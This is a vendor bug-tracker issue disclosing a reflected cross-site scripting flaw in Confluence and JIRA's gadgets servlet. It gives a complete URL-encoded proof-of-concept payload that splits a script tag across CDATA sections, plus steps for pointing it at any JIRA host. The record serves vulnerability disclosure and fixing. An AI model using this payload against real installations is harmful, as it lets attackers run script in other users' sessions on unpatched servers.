Uploaded image for project: 'Confluence Data Center'
  1. Confluence Data Center
  2. CONFSERVER-34248

Reflected XSS affecting Confluence via Gadgets

    XMLWordPrintable

Details

    Description

      Steps to recreate:

      1. To view the reflected XSS affecting JIRA, present on the current JIRA installation (jira.atlassian.com) visit the following link:

      https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

      2. To perform the reflected XSS attack on any JIRA installation (not sure how far this issue dates back to), replace the host (jira.atlassian.com, found on later in the URL) with the one you wish to test on, and append the path to the base JIRA directory.

      /plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml

      Note: This XSS requires no user interaction, or authentication.

      The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.

      Attachments

        Issue Links

          is cloned from

          Bug - A problem which impairs or prevents the functions of the product. JRACLOUD-66366 Reflected XSS affecting JIRA via Gadgets

          • Medium - Medium priority issues
          • Closed

          Activity

            People

              kmacleod Kenny MacLeod
              shaffenden Steve Haffenden (Inactive)
              Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: